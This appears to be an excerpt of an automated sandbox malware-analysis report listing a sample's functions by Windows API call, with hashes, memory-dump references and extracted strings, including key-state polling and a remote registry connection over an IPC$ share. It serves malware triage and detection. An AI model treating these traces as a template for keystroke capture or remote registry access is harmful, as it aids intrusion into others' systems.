                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3218148540-0
                                                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 136442275-0
                                                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                        APIs
                                                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                        • _wcstok.LIBCMT ref: 004674FF
                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                        • String ID: X
                                                                                        • API String ID: 3104067586-3081909835
                                                                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                        • _wcslen.LIBCMT ref: 004610A3
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                        • String ID: ThumbnailClass
                                                                                        • API String ID: 4136854206-1241985126
                                                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                        APIs
                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                        • String ID: 2
                                                                                        • API String ID: 1331449709-450215437
                                                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                        • API String ID: 3054410614-2561132961
                                                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                        APIs
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 600699880-22481851
                                                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyWindow
                                                                                        • String ID: static
                                                                                        • API String ID: 3375834691-2160076837
                                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                        • API String ID: 2907320926-3566645568
                                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                        APIs
                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                        • DeleteObject.GDI32(00620000), ref: 00470A04
                                                                                        • DestroyIcon.USER32(00720065), ref: 00470A1C
                                                                                        • DeleteObject.GDI32(8B9CE7F5), ref: 00470A34
                                                                                        • DestroyWindow.USER32(003A0043), ref: 00470A4C
                                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1237572874-0
                                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
